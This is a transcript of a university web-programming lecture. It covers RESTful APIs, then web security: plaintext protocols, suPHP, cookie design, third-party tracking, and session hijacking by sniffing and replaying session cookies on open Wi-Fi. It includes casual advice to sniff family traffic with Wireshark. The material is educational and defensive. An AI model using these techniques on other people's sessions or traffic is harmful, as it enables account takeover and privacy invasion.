All right, welcome back to E75. 2 lectures remain, then we get a week off, and then we come back for the fair and cake and exhibition of your projects and such. Because we've spent a bunch of time talking about things probably not of general interest, namely Harvard's dining hall menus, I thought I would draw your attention to data sets that might be a little more interesting, at least if you're Harvard affiliated. So we'll just spend a brief moment on this, because not everyone in the class certainly is affiliated with Harvard. But we spent for that other class that I teach, and also for this class, a while documenting a bunch of APIs. So an API is application programming interface. Can mean slightly different things in different contexts, but it generally means that someone else has made available functions that you can call so that you can integrate someone else's functionality or data into your own applications. So you're using Google Maps' API for the current project, for instance. Well, if any of you take an interest for final projects in playing around with some Harvard-specific data, you'll see that we've put together a suite of what are generally called RESTful, R-E-S-T, APIs, which essentially boils down to very simple APIs that are language agnostic. And so rather than focus at all on the data that these things provide today, I thought we'd just pick a simple example, for instance, this one. So Shuttleboy was that website that we played around with. We talked about the AJAX aspect of it last week that allows you to find out shuttles between point A and point B. So it'd be nice if you could get at that data without having to screen scrape the website, which is another topic altogether. And incidentally, I will post this later tonight. I went ahead, because last week was somewhat of a whirlwind tour of screen scraping, I went ahead and essentially documented everything we talked about last week on this page here, as well as made available all of that source code. So I'll link this on the lectures page after tonight if you are curious about how one might go about screen scraping, whether or not you're interested in dining hall menus. But Shuttleboy is this interface that allows you to programmatically access shuttle routes between points A and point B. And I thought we'd take a quick glance at what it means to be a RESTful API, since these things are increasingly common. Yeah?
When you mean last week's lecture on screen scraping, you weren't actually screen scraping. You're talking about you could have did whereby you did the back-end request and then passed out the data, right?
Yes, but let's see. Last week, as I recall, we spent some time on the dining hall menu, right? So that was screen scraping. Screen scraping in that I wrote a script that grabbed the HTML via HTTP and then programmatically parsed it. And I happened to use XPath and Tidy for that. Yep, so that's what I meant by screen scraping there. And there exist client-side tools that facilitate such, but my goal was to write this thing once, run a cron job, and henceforth, I've not had to look at the code again, since it runs itself automatically every night. So just to give you a sense of APIs that are out there, you'll find that what I did was base this and all these other APIs on things I've seen at Twitter, for instance. So Twitter was one of the most recent APIs I played with for the silly little Harvard Tweets site, but they too support a RESTful API. If you look at Flickr, they too support a RESTful API. And this is a nice thing because, at least early on a few years ago, the trend in making web services, as they tend to be called, available was rather heavy-handed. You would have to use these protocols like XML RPC or SOAP, or you would have to download client libraries, whether it's in PHP or Python or Java, and you would essentially have to use other people's code, which itself is not so problematic, but it's more problematic, say, for them, who had to write the code that you then use to interface with their service. Now, with that said, there are actually tools that allow you to automatically generate what's generally called stub code, whereby, without going off on this tangent, since we spent a whole semester on this in previous years, in another course of mine, there's this thing called WSDL, Web Services Description Language, where you can very much genericize the idea of a web service, a website that provides people with data and functionality, and you can describe that functionality in XML. And then you can use various free tools to generate actual Java code or PHP code based on that XML file. But frankly, it was a whole production. It was kind of a headache, even for me, and we were teaching this at the time. Useful, to be sure, but certainly not very simple. And so instead what you have these days are things like this, which I'll draw up a real world example here. So Twitter API leads me to this documentation here. I'm going to click Twitter API documentation, and you see that Twitter supports a number of methods. Now, these methods are really just URLs. They're not actual pieces of code that you would download and compile into your own programs, but rather, let me click the search link here, which is pretty much the main one that I used for that project, and you'll see this kind of documentation where they say this method search returns tweets that match a specified query. What URL do you access this method by? Well, you simply visit http:// that thing, and then down at the end it says /search.format. So this is essentially the base URL that you, the programmer, want to access if you want to get back data from Twitter, if you want to search their database. Well, that thing in italics .format can be either JSON or Atom. Atom is sort of an alternative to RSS. It's an XML format, very similar in spirit, totally parsable using PHP simple XML or any other library. And so that suggests that you can get back your response not by way of some proprietary format, but frankly via a fairly generic open standard. So that's perhaps compelling unto itself. And then if you scroll down in their documentation, you will see that they document what parameters are possible. And their documentation's a little messy, I think, although they do have lots of examples, which was very helpful. But you'll see that you can pass in a callback argument, a lang argument, locale, RPP, page. I don't know what most of these things are. In fact, I didn't care what most of these things are, but they allow you to parameterize the method call, that URL string, so you'll get back different results based on this information. So essentially what I did was use one of the simplest arguments, which was, where is the documentation for it? Ironically, they don't seem to, really say it here. So I essentially use the Q parameter, which you can see in this sample code here. And I do Q, and then I specify screen name equals Malin, for instance, to get all of Malin's tweets, who does not actually tweet. And then I get back a bunch of JSON code or Atom code that I can then parse, insert into my own MySQL database, and I'm done. And what's really nice, and frankly what made this project possible in literally just a night, was because I could use any language I wanted. All I had to have was a language that can make HTTP requests, and I needed some kind of library that could parse JSON or parse XML, and both of these are readily available these days. I happen to choose PHP, but you can do this in any number of languages. So similarly, did we take this approach for Shuttle Boy? So Shuttle Boy's even simpler. There's not all that much functionality, but we support two methods, one called stops and one called trips. The first returns all of the possible stops on campus and the GPS coordinates for them, and then trips takes in two arguments, A and B, and it tells you what the next several shuttles are. So, for example, this is the base URL that we've advertised to people, shuttleboy.cs50.net/API/1.0, so we can version it, /trips. So that's very similar in spirit to what Twitter did. And then we have a ampersand separated list of parameters and values. What can those parameters be? Well, in this case, not all that much. A, B, which are stops, EDT for end date or SDT for start date, and this in short allows me to get back a bunch of data just based on these parameters. So a very simple example might be this. I want to go from, let me copy this, the base URL. Let me go from A equals the quad, which is residential housing up the street, and B equals stadium, which is the stadium across the river, and I'm going to go ahead and say output is going to be CSV. I'm going to hit enter. It's going to prompt me to open up my CSV file, which is null apparently, so we'll save it locally, and then open with Excel. And this is now in, let's see here. There we go. So what we have in here is a CSV file containing a departs column and an arrives column, and that's it. And now, doesn't matter to me what language you're using, what program you're writing, you have the data, you can now do with it as you see fit. So it was really kind of cool, frankly, and if you are the type who likes making mashups or you like just random coding projects, increasingly should you find out there that people are making their data available in these very generic formats. I mean, in a hash table or JSON format, which is just a very simple hash table, is pretty much as simple as it can get when it comes to returning keys and values. So cool stuff out there. And this is just representative of that if you would like to play for your own final projects. Any questions? No? All right. So today's about security. So we waved our hands for several months about all the interesting, scary implications about making this design decision or that. And today is about posing questions and revealing threats, and then maybe addressing some of them. But some of them will unfortunately have to push under the rug as just being the realities of internet computing today. So let's see what those are, and I'll see if we can't scare folks, since that tends to engage the most when you're personally threatened. So what are some obvious threats to one's security or privacy with regard to the internet, and more specifically with regard to making your own web-based applications, which is obviously what this whole course has been about. So Telnet is sort of a precursor to what we mostly use these days, which is SSH. What was interesting or noteworthy about Telnet, if familiar? Yeah. Yeah, so passwords are sent in plain text. So this is a protocol that allows you to log in from point A to point B with a username and password, but very naively, back in the day, did the username and password just get sent in the clear, which meant anyone with physical access to the network between points A and B could, in theory, figure out what you're logging in with. And this isn't all that foreign. I mean, even Harvard, when I was an undergrad, 95 to 99, I mean, we used Telnet. SSH was not in vogue, and I don't even recall what year it really came out or gained steam, but this used to happen all of the time. Now, this is even worse these days because of what somewhat newer technology. No, so SSH is a good thing, but sending passwords in the clear is even more worrisome these days because of Wi-Fi and wireless connectivity most everywhere. And you'll see, if you want a little cliffhanger for today, you're pretty much screwed if you're using things like Starbucks or anything that's fundamentally unencrypted if you care at all about what you're doing on the internet. So more on that in a bit. FTP. So a number of you on the bulletin board and just verbally still use the expression, myself included, of FTPing a file from A to B. But FTP is not such a great protocol, at least for personal projects. For what reason? Same reason, right? We're going to have some very similar answers for the next couple minutes. All right, so similarly, is FTP lacking that leading S? It's not secure because its usernames and passwords, too, are sent perfectly via the clear. Now, FTP still has value. It's still commonly used for distribution of large files or just files in general. You'll often log into an FTP server anonymously. This is sort of a feature of the protocol that it allows this, or you log in with your email address and it just lets you through. And this is used for distributing Linux software very commonly, or just it's used for Dropbox purposes. When you want people to be able to deposit files somewhere, web uploads, still annoying, frankly, using the little browse button and then just hoping that the thing succeeds. At least with FTP, you can see progress. It can even resume in theory. So it's still a good protocol, but not commonly used for anything private because it's perfectly insecure. So there's an easy solution to that. We had SSH for Telnet. We had SFTP for FTP. What about HTTP, which itself lacks an S? What's the alternative? All right, so HTTPS, and we'll come back to this. HTTPS just denotes the use of something called SSL, which has some upsides, but also some downsides. And MySQL too. So you can create encrypted connections between point A and B using MySQL, but frankly, it's a lot harder than it should be. And the reason that we simply don't allow connections via MySQL to CS75.net is for precisely this reason. If you just do MySQL connect and MySQL select database and MySQL query in PHP or any other language, you're essentially sending those queries in the clear. And to do that from your homes and your personal computers to CS75.net just tends to not be best practice. And so that's why we just firewall off port 3306, which is MySQL's default port number. So that's why if you've ever tried at home connecting, you simply cannot. So how do we deal with some of these things? Well, we have various software installed, and this one addresses none of those problems, but something completely different. So SUPHP stands for Substitute User PHP. We talked briefly about this in the beginning of the term. Anyone remember in just a sentence what this software does for us on the server? Okay, good guess, given the previous several bullets, but not quite. Kind of. We can make that answer work. The S doesn't stand for secure here, but it does give us some additional security. So when you typically run a web server, you would say install Windows or Linux, and you would then download a web server like maybe IIS, or let's just focus on Linux for today, something like Apache. When you run Apache, you typically run it under what username, though? So root, although fortunately that's less commonly done, and out of the box most Linux distributions don't run Apache as root anymore. They use what username or usernames instead? Sorry? Admin, sure, yeah, that's possible. There's others that are probably a little more common. Apache, the username Apache is common. Web apps is a common one too. Web is another one. Really, it can be anything, but various Linux distributions have their own standards for this. And the point, though, is that it's anything other than root. So running anything as root in the Linux, Unix world, and even any computing world is generally bad practice, because it means if you, the author of that program that's running as root, screw up or make a mistake, you potentially give access to anyone with access to that server, and now we mean literally anyone on the internet, with the ability to take control of your server. So we've all probably read of various exploits that have happened on this web server or this personal computer, and very often it's just because of one stupid bug, not checking the bounds of some array or overflowing some buffer. And what that generally means is that if there is a bug in a program that's running with super user privileges, as root does, you can essentially become that user and wreak havoc on a server. So fortunately, you can sandbox a web server these days and run it as a specific username, like Apache or web apps or whomever. But what does that mean for a system like CS75.net or any shared web host that you might pay money for these days that has a bunch of other user accounts too? If the web server is running as username Apache, what do the file permissions on your own PHP files and HTML files and GIFs and all of that have to be? So they either have to be assigned to the Apache account, so you have to use the chown command, C-H-O-W-N, and change the ownership of those files to be Apache so that the Apache user can read your files. That's really not practical, certainly on a shared system, because it means you would have to relinquish control of your files to that web server, and most users can't run chown. Only root can do something like that. But that would solve the problem, but not very well. So what's an alternative to actually just giving ownership to the web server process? So chmod, right? The alternative which you do have within your control, you can just make all of your files world readable. So in octal notation, you can make most of your files 644. Maybe your directory is 711 or 755. In short, you just have to make sure your files are readable by the web server, but really Linux doesn't have terribly fine-grained control out of the box for user permissions, at least that if you don't yourself have root access. So the best you can do is kind of give everyone in the world access to those files. Now that doesn't mean people on the internet are going to be able to see your PHP code, because if the web server is configured correctly and they visit foo.com/bar.php, you shouldn't see that code. What should you see instead? The rendered code, the result of actually parsing that .php file and sending the results to the browser. But even though the rest of the world can't see your files, even though they're chmoded 644, who can? What's that? Everyone else on that system. Right? So this is bad for a number of reasons. In a shared environment, even academically, so we don't really want to make it that easy for fellow students to just kind of snoop on each other's codes. Just not right. But if you're all writing the same projects, and you all know, at least with high probability, what file names you're all using, and you know that the web server needs to be able to read those files, and thus they're chmoded 644, that means you too. If you know the file name, the directories don't even have to be readable. If you know the file name, you can just with Emacs, Vim, Nano, FTP, whatever, SFTP, look at those files yourself. So that's bad for our purposes. And on a shared web host where you don't even know the other users, do you really want random people who are also paying $6 a month to be able to look at your intellectual property and copy your code? Right? Your competitor can literally sign up for an account with the same host and just copy all of your content. So that too would be bad. So there are a number of problems that arise here. So what's an alternative? Well, there's something like SUPHP, and as the name implies, substitute user PHP, just like the SU command on a Linux box. This means that your code is actually run not as Apache, but as you, the owner of those actual files. What's nice about this particular software is that it's free. It's relatively easily installed on modern Linux distributions. You might have to tweak some configuration files, follow some how-tos online, but for the most part, it's fairly uncomplicated software to configure, and once it's up and running, it just works. When it sees that foo.php is owned by Mailin, it will have the web server, no matter the username it's running under, change its user ID to be Mailin while it executes that code. Which means if I screw up and I do something really stupid, like use the system call or the equivalent of a val in my code, and I make it possible for outsiders to exploit my code, who am I putting at risk then? Hopefully just myself, which is not great, but at least it's a lot better than exposing the entire system or making all of my code readable to everyone else on that system. So any questions, technical or otherwise, about SUPHP? Yeah? So why doesn't everybody use SUPHP? It's a a good question. On web hosts, probably lack of savvy, lack of interest. They take advantage of the fact that their customers probably don't know the difference. It's a lot easier just to not install it, frankly. And I'm slightly simplifying. Most things in Linux are not as easily done as said. So the reality is it does take some head banging sometimes to get these things to work. I suspect it's a variety of those reasons. And frankly, you're paying $6 a month. It's also, security is probably not their top priority anyway with some of these web hosts. Yeah?
So what if you have a shared project? Like, this is the final project with 4 people working on it. And who owns the files?
So it's a really good question. So in the case of a course like this, or just in general projects where you want multiple people accessing the accounts, you would typically do one of a few things. And we can do this too for you guys if you're working with partners. You would either create a separate account that they all just know the username and password to. It's a little logistically annoying to have another user account, but it's simple. It works. You can create a Unix or Linux group, so to speak, not students, but for instance, the foo group, and you put those 4 people in the foo group, and you make sure that they chown their file or to group their files. They change the group ownership of their files to just be those 4 people. The downside of that is that if someone accidentally creates a file and leaves it owned by him or herself and forgets to change the group membership to that group, then you're going to have emails going across the wire saying, hey, go fix your file permissions. So suboptimal. But those are generally the 2 approaches that people would take on a system like this. Or you would use something like source control, like SVN, Subversion, or CVS or RCS, and you would all work independently, but then maybe commit the files somewhere centrally where they're then run. In theory, that could be done too. Other questions? Yeah.
So does su.php, when you make the request to the web service, it then changes the ownership to the root user for that session?
It doesn't change ownership to the root user when it changes it to the owner of that particular file. So we can actually see this. Let me go ahead and log into cs75.net. And let me go into our public HTML directory, and let me write a quick program on the fly here, called foo.php. And I'm just going to say hi for the moment. This is how I start most any project. Just make sure it's working. foo.php. Okay, good. So my first program's working. All right, you laughing because you do this too? No? All right, so maybe I'm a little simple here. So let me go ahead and actually run some code now. It turns out that there's a command called whoami, which literally tells me who I am. And hopefully, if the server is indeed configured as we predicted, if I run something like this with backticks, you can run a local command, I should see the output of this command, which hopefully is not root and hopefully is not Apache. And let's go ahead and see. Indeed, it's CS75. And that is because if I do a ls-l of foo.php, the ownership of this file is indeed CS75. And you can do other things too. Let me see if, all right, I promised I was going to stop doing demos on the fly, but this one could be interesting. Let me go into CS75's public HTML directory as root now. Let me chown this file, foo.php, to be Malin. Okay, so now if I do an ls-l foo.php, now the file's owned by Malin, but it's still in the CS75 group. Let's go ahead and run this. And now something bad happened. And this is actually a security precaution. We've configured the server in such a way that if there is a file in my account owned by someone other than CS75, the code should not run. It should trigger an error like this. And this is just because we can be paranoid this way, so that if somehow someone else's file gets uploaded, we do not accidentally execute it within our own tree. So that's a good thing there. Okay. Phew, that demo did not backfire. Any questions? Okay, so let's continue down this stroll of things familiar but nonetheless threatening. So we've talked a bunch about cookies, and here's where Starbucks comes into play. So cookies are just little text files stored on your computer, or just pieces of data stored in RAM temporarily if it's just a session cookie. But they're implemented by way of this very simple mechanism. So this is an example of what? An HTTP request or an HTTP response? Okay, and why do you say that? It is a response. 200, right? The server gives the HTTP status code, not the client. So that's one clue. And also the one that I bold-faced there, set cookie, is a directive sent by the server. The client, by contrast, just sends, little trivia? Not quite session. What's the name of the HTTP header that the client would send. It's not set cookie. It's just cookie : So that's the opposite there. So the server here is telling me, the client, here is your session ID, your PHP sesh ID. This is just the name of the cookie that PHP uses by default. We could change this, but this is the standard. And it's telling me to use 5899 ... This is my special, unique value that identifies my super global session object, and it's going to be valid for the whole domain as implied by the path there. You can actually have cookies be valid only for certain subdirectories and even for certain subdomains. But for now, this is just saying the whole domain is going to use this session ID. And then it's also sending this little secret. So 1, 2, 3, 4, 5. So this is an example that I conjured up that might be a stupid implementation of password remembrance. So there are lots of little checkboxes on websites, our own included, that say remember me in some form. Well, we looked at a sample login mechanism weeks ago that very foolishly just remembered who you are by storing in a cookie on your computer your username and your password. And every time I visited facebook.com or whatever the imaginary website was at the time, it would re-log me in because it had the credential stored there. But now shoot down that approach yet again. What was stupid about that? Okay, so the HTTP response has it, which means I would be sending to facebook.com or the equivalent a couple of cookie values, among them my actual password. And why is that bad? So it's clear text. I mean, we can read it here, and indeed, if you're just using HTTP, this stuff is going across the wire. You might not normally see it, but hopefully many of you have gotten into the habit this semester alone of using tools like live HTTP headers, where if you go to any website, you can see what is in fact going across the wire, just that it's generally hidden from users because it's not of genuine interest to them. But we can see it certainly. Why else is this bad? To just store in a cookie the user's username and password. Yeah, maybe it's your machine gets compromised, right? There's all these exploits out there. These days, not hard to imagine someone finding your cookies and uploading them to a server and then using the data for malicious purposes. How about here on campus? Why is this particularly bad? Or in an internet cafe? What's bad about using cookies in this manner? Yeah, so the next person who sits down, if they haven't actually restarted the computer, if it hasn't flushed its cookies, if it hasn't formatted itself or doing whatever lab computers are supposed to do, it might not be your computer. So storing a cookie on a computer is not necessarily a good thing. So many, many different problems with this. So an obvious solution is don't store the password in any sort of cookie, but do what we did in that code and we do on the course's website, which is we store, the analogy we used at the time was a stamp, a hand stamp, whereby we generate, similar in spirit to the session ID, a really big random number, and we store on your computer your username. So what we do is every time your computer sends your username and that really big random number, we check a database saying, oh, did Malin last log in with username Malin, and did we give him this hand stamp, this really long random number? It's not his password, which means if I just glance at it, I don't have unfettered access now to Malin's account on cs75.net, but this way, too, can I expire the cookie server side by just deleting my own recollection of what David's really big random number is. So the next time he presents it, I can just say, I don't know what that big random number is. I don't know who you are. So this was our way of still giving you this ability to stay logged in, but without actually storing your password. But it's not perfect, right? We avoid storing passwords, but what is the threat now? If we're just storing your username and this really big random number that, again, has an expiration, generally of 7 days in our case. So this thing called session hijacking. So even if you don't know what this term is, think about just basic principles here. So this is what HTTP is all about, and you know that cookies are stored generally if they persist like in a file somewhere in your hard drive. So what might it mean to hijack someone's session, or how might you do this? Yeah, so here's the danger, right? I don't need to have your username and password to log in. I can just have your username and this really big number. So that begs the question, how do I get this really big number? Well, if it's HTTP, I can just sit next to you in some wireless internet cafe. Sorry, text message plugged into the speakers. I can just sniff your wireless traffic, and I can see your username and your really big random number that your browser is automatically sending because of this cookie mechanism. Or I can sit down at your computer or the lab computer that you check that box on, find the really big number, and then even if it's been somehow lost and I recover it from disk somehow, hopefully you've realized that anyone can forge, whether by writing a program or using a Firefox plugin, HTTP requests these days. And you can certainly send any cookies you want if you have the right tools or savvy. So I could hijack your most recent session by just saying, I am Malin, and here's my really big random number, even if I'm not Malin. I'm the random person who sat down after me at that internet cafe. So session hijacking refers to just the stealing of some pseudo-random information, typically, that's useful to you, the user, but also puts you at risk. And specifically, what session hijacking is, it exists on a couple of levels. I just described it with CS75.NET in particular, but the same thing here. How are PHP sessions maintained? How are sessions in most any programming language maintained? They too just use these really big random numbers, and that's how my browser is associated with that temporary file in /temp on the server side. So if you just figure out a random internet user or someone sitting next to you in Starbucks, what their session ID is, they don't even have to have checked that little box. They don't have to have stored any cookies on their browser other than this temporary one that their browser is just blindly sending back and forth across the wire. I can hijack their whole session just by finding that number, sniffing it out of the air, and presenting it to the website as my own. Now, what does that mean concretely? Well, if this person in the Starbucks is checking their Facebook account and I sniff their wireless traffic, see the session ID, I literally can just connect to Facebook, use whatever plugin or programming chops I have, and send that same session cookie, and voila, I am now logged into Facebook as that user. Assuming Facebook doesn't automatically expire them or kick me out. You could imagine using IP address checks and whatnot, but if I'm in Starbucks on a shared internet connection, what are we both going to appear to have? Same IP address. So there's actually no easy IP-based solution to this. So a little scary. You're sitting in an internet cafe. You're sitting on an airplane these days. Or you're sitting in an airport these days. Anywhere there is unencrypted wireless connectivity, any website you have logged into, for the most part, puts you at risk of this. And really your only protection is the non-technical nature of the people sitting next to you, or just the lack of interest on their part on what you're actually doing with your computer. So what can you do to protect yourself? Hopefully there's a solution here. So log out, right? So certainly don't log in. So the most draconian approach, but very secure. Okay, so log in and check your mail very quickly. Check your pokes very quickly. So no, that's valid, because if you log out, that should hopefully tell the server, expire that session cookie, assume it's invalid. We've seen how to do that in our own logout code, so that's one approach. It would hopefully delete that /temp file, but maybe that's not practical. Kind of need to get some work done at Starbucks. That's why I'm there. What defenses do you have? Okay, all right, so you say it skeptically, but yes, you can throw encryption at the problem, right? What is one cryptographic mechanism we could use to avoid this stuff being sent in the clear, which is the fundamental problem? Okay, so we could use a VPN. If you have access to Harvard's own network here, which you do with your FAS accounts, you could download their Cisco client. You could sit down in any insecure location, and you could establish an encrypted connection between you and Starbucks or wherever, and harvard.edu, thereby encrypting your data from Starbucks to Harvard. You still run the risk of people between Harvard and the servers you're accessing, like Facebook, actually sniffing your traffic on a wire, or maybe Harvard is using wireless or microwaves or satellite somewhere. So it could still be intercepted, but at least you've pushed the adversary so far out that they probably don't care about what you're doing in that Starbucks cafe anymore. What else can you do besides VPNing somewhere? Use HTTPS, right? So only access a site by HTTPS. There's a catch, though. So what if the site doesn't support it? And in fact, most sites do not in perpetuity. Most sites, when you log in, will very briefly send you to https://login.facebook.com or something like that. They'll then accept your username and password in encrypted form so that those credentials can't be sniffed. But then what do? They store a session cookie in your browser's RAM by default so that you stay logged in thereafter. And then they send you back to http://. Why do they do that? It's faster, the overhead. So though it is sorry, I'm getting a lot of text messages. All right, now they're private. So though it's once you've got SSL set up, it's really not hard to keep the user on SSL. You can use an htaccess file, mod rewrite, and you can essentially require that the user only access your site via HTTPS. So that part is not hard. I mean, this is something you can send to the sysadmin and say, make my website operate over HTTPS, or you yourself, if you know how, can do this. It's not hard once it's set up. But most sites send the user away from HTTPS for the reason that it's expensive, especially for popular websites that have to handle thousands or tens of thousands of hits per second. If each hit takes a few milliseconds more of computational power, that means more money for them. That means they need more web servers. That means they need faster web servers. Right? There's actually a financial and a technical implication of turning SSL on. Now, for CS75.net, we're not going to have 1,000 people trying to access the bulletin board at any given time. And even in a class of 100 plus students, we'll probably have a few dozen requests per second. So we can absolutely sustain with very cheap hardware the SSL computational costs. But one of the topics next week will be about exactly this, scalability. When you actually start to have to add up all of the cycles you're spending, you start to actually incur money and complexity because you now need multiple computers and not just one server. So what types of sites have you noticed actually use SSL throughout your whole session? Any come to mind? Banks, right? So they kind of have a lot to lose and generally more money to spend on things like this. So typically if you access bankofamerica.com, ingdirect.com, you will stay on SSL because really what's the worst that's going to happen if your Facebook account's compromised? You're going to say some scandalous things. You can't really steal people's money unless there are credit cards associated with it. But even then, the cost of some fraud is probably much less than the cost of 100 more servers, for instance. So banks tend to do this. So it's an interesting design decision that really is governed by performance in the end. Yeah? It's a good question. So is the solution to disable cookies? It is the solution to this particular problem. If you don't want someone logging into your Facebook account, then you can disable cookies, and they cannot because you won't be sending this thing back and forth across the wire. The downside, though, is what? You can't use your Facebook account, right? So, I mean, that is the trade-off. And there are some sites that sort of 1990s style say in small font, you must have cookies enabled to visit this site. And that's because these mechanisms like sessions are the product of cookies now existing. So HTTP, recall from like week 0 in the course, is stateless, right? The spinning globe spins, and then the moment you get all the HTML back, it stops spinning. You do not have a persistent connection. The gates close. Unlike SSH, whereby once you connect, you stay connected. That is a stateful connection. So that's really nice with HTTP that it's stateless, because it means it's fairly low cost. You can have many thousands of people hitting a server in any given minute because they're only talking to it briefly and then disconnecting. It's harder to do that with something like SSH or anything that's persistent. But okay, now am I speaking? Okay, sorry, I'm not very good at this. Okay, now it's off. A free pass if anyone wants to take calls today, but yes. So the what was the thought? What sentence were we on? Oh, it's stateless, right? So if HTTP is stateless, that's a really good thing for performance reasons and scalability and simplicity, frankly, but you then can't stay logged into a server unless you do hacks like remember their IP address. Pretty risky, especially with all the shared IP addresses that happen these days and internet cafes in your own homes and so forth. And so cookies are a means of avoiding that. You, with high probability, maintain a connection, so to speak, between point A and B by just telling them, putting the burden on them, the browser, remind me who you are, remind me who you are, remind me who you are every single time you talk to them, hence the set cookie and the cookie headers. But if you turn off those header mechanisms and say no cookies can go back and forth across the wire, I'm going to look like a new person every time I visit them. And I should be then sent to Facebook.com, the login page, every single time. So that's the trade-off. So in short, with something like Facebook and probably with 50%, 90% of websites out there, you're kind of SOL. Like you either use their website and you just cross your fingers, or you don't use it for any particularly personal reasons, or you just accept the fact that you're probably not a very high-profile target, and so yes, the person sitting next to you could do all of this, but do they know how? Do they care? Probably not. That's probably your best safeguard, is people's disinterest in you. I mean, anyone, not just you. Okay, any questions? So stop checking your Facebook profiles and the like in Starbucks. So there's a few ways. Oh, yes?
Yeah. If cookies are saved on the hard drive,
Mm-hmm.
can websites read all the cookies that are saved there?
Good question. So if cookies are files on your hard drive, can websites read all of them? No, by design, they should not be able to. A website, foo.com, should only be allowed to read cookies that were saved there originally by foo.com.
What's controlling
The browsers, the correctness of the browsers.
You're basically relying on certain technology. Basically, you're saying you have to have trusted browsers.
Correct. And cookies got a bad rap early on, say mid-late 90s, because Microsoft and Netscape, they were screwing up, and they were exposing cookies to other websites even though they should not have been. So you tend to read of this much less these days, but yes, you must trust that the browser is behaving correctly, because it's the browser that's sending directives similar to this one, cookie : and if the website is somehow tricking the web browser into sending you other cookies, that's when this information is leaked. And as an aside, this isn't so much a threat to security, but it's very much germane, and people are starting to freak out with higher frequency over Google these days. Google owns what very useful, very popular tool? What's that? Okay, Gmail. True. I'm thinking something that's more related to like data collection, though, and analytics, which that one is, but there's a scarier one. So Google Analytics, which even we use, and many, many websites use it because, frankly, it's wonderfully free reporting statistical software that allows you to get eyes into where your users are coming from, what browsers they're using, and all of this. And Google Analytics works by embedding a little snippet of JavaScript code in one's website. If you've never seen this, let me go ahead and pull up our own courses homepage and pull up our source code. And I believe at the very bottom we have this. So I literally copied and pasted this from Google Analytics after creating an account and all that. It's a little cryptic looking JavaScript, but it's really just compact. And what this essentially says to the browser is anytime someone visits cs75.net, any of the pages there, perform a hit, an HTTP request, to googleanalytics.com and get some JavaScript code. And what that JavaScript code does is essentially figures out a bit of information about where I am, what URL I'm at, what browser I'm using, and other juicy details, and then sends them back to Google. Now, this isn't supposed to be for nefarious purposes, and for just us, it's wonderfully useful because we can then let Google, we can outsource the analysis of our web logs, essentially, to Google. But the worrisome part is when not just we do this, but you do this, and you do this, and you do this, and CNN.com does this, and Facebook.com does this, and all of these big popular websites do this. Now you have one middleman who's sitting in the sort of the hub of a spoke here, a spoked wheel, where Google now knows everywhere that you, the individual, are going. Because the way cookies tend to work is that, or the way Google Analytics works is Google Analytics puts a cookie on your computer. But if they're doing this for this website, this website, this website, per your concern a moment ago, the same website can absolutely access all of that data. So Google knows all of the different websites, or could know all of the different websites you're going to, because Google can cross-correlate all of these cookies, because it, by design of browsers, has the right to read all of those cookies it put there. So this was initially worrisome because of people like DoubleClick, very popular advertising companies, which ironically Google now owns, which makes the problem even worse. So I read some statistic recently that Google probably can know about 90+% of people's browsing behavior these days between ads and between the opt-in approach of websites to using Google Analytics. So it's this brilliant doing some evil strategy that they've got. And people are starting to freak out over this because, and as some of the eyes or nods in the room seems to be that most people probably don't appreciate just how much introspection Google has into what you're doing just by nature of the websites you're visiting. So there is at least one defense against this. There's a relatively easy defense about keeping people like DoubleClick, now Google, out of your privacy. What can you do with your browser? So you can clear your cache frequently, and you can do that nightly, daily, hourly, whatever, and that means that Google, they'll still be planting cookies on your computer, but it'll be a new cookie every day or every hour, which means they can't correlate all of your browsing behavior across days or weeks or months. What else can you do? Yeah, you can disable what are called third-party cookies. So let me see. I actually, because I have so many damn computers that I use in browsers, I frankly don't do this anymore. But if I go to Preferences in Firefox, let's say, Privacy, let's see, Security. Anyone remember where this is? Is anyone paranoid in the class? Know what I'm looking for? All right, let's see if I can find that. It's nice that Firefox makes it easy for us.
Can you not do it through the web developer toolkit?
Oh, maybe. Let's see. Web developer cookies. Oh, disable. Oh, okay. So they call them something different. So I'm sure I could do this via some standard way in Firefox, probably in IE still, in Chrome and all of this. But they call it not third-party cookies, but external site cookies. Most, dare say all browsers allow you to disable cookies, not from the website you're visiting, but from any other websites that they include in their source code that might also try to plant a cookie on your computer. So if you're paranoid about the advertising industry or Google Analytics or the like, it's very low cost, if any, for you to just disable these external or third-party cookies. The worst thing that might happen is maybe an additional ad doesn't pop up for you, which might alone be a feature unto itself. But for the most part, disabling third-party as opposed to first-party cookies will not break your interaction with the site. So you can at least keep the folks like Google and DoubleClick at bay by at least disabling those. And what the browser will do, just to make this technically concrete, will not send headers like cookie : for that particular domain if you've said not to. So that's an easy fix.
The third-party cookies, though, can't get the first-party cookies.
That is correct. Third-party cookie people cannot get first-party cookie people unless the two are talking via some business relationship. So it's actually interesting, and in my consulting life, we've tripped over this. There's definitely been talk over recent months, recent years, that some browsers like IE8 would just disable all third-party cookies by default. This would wreak havoc on the whole advertising industry if all of the browsers kind of colluded and disabled this, because there have been a lot of applications, some nefarious, some annoying, some useful, Google Analytics, that have arisen because third-party cookies are allowed. And what you should realize, too, even though you generally see third-party cookies being introduced because of JavaScript, any included file can send a cookie, right? Even GIFs and JPEGs and PNGs come with HTTP headers, and they too can come with cookies. So if you just visit a website that has no advertising but has an image that someone has cross-linked from some other website, or some CSS, or some JavaScript, or some Flash file, anything, all of those can come with HTTP headers, among which could be the set cookie header, which means you're vulnerable, so to speak, via any of those types of inclusions. And this whole disabling of third-party cookies should at least stop that kind of behavior. All right, so just to wrap up this notion of session hijacking, so how does one gain access to your session cookie, your session ID, the value of PHP session ID? So physical access, right? Just look in their browser, look at Firebug or whatever, and see what's going on inside their browser. Packet sniffing, it's pretty trivial. In fact, if you want to, don't do this on Harvard's campus because they'll frown upon it in a disciplinary way. But if you download something called Wireshark, formerly called Ethereal, you will have a very free, very useful packet sniffing tool. And you can actually do this and do it in the privacy of your own home. Sniff your family member's traffic, then it's probably kosher. You will see a steady stream in a scrolling window of all of the traffic that's going across the wire. And if you really get nosy and your family members approve this activity, you can see inside of these packets, like what instant message was just sent, what email was just sent, unless they're actually using some secure protocol like HTTPS or something encrypted. So Gmail came up a moment ago. Gmail actually has an HTTPS feature that will require all connections be secure between you and them. The site might feel a little slower because of the computational cost, but realize that, frankly, as Moore's law gives us some cycles for free, this will probably become more common because it's just generally foolish not to encrypt things when you can. So soon, hang in there. Your life will probably by default be more secure. Other things, session fixation. I just put some buzzwords up here lest you see them. So session fixation means fixing the session ID manually, sending it somehow manually. That's the fancy speak there. And cross-site scripting, XSS, we'll actually come back to in just a moment. So what can you do to defend yourself? You can just certainly make these 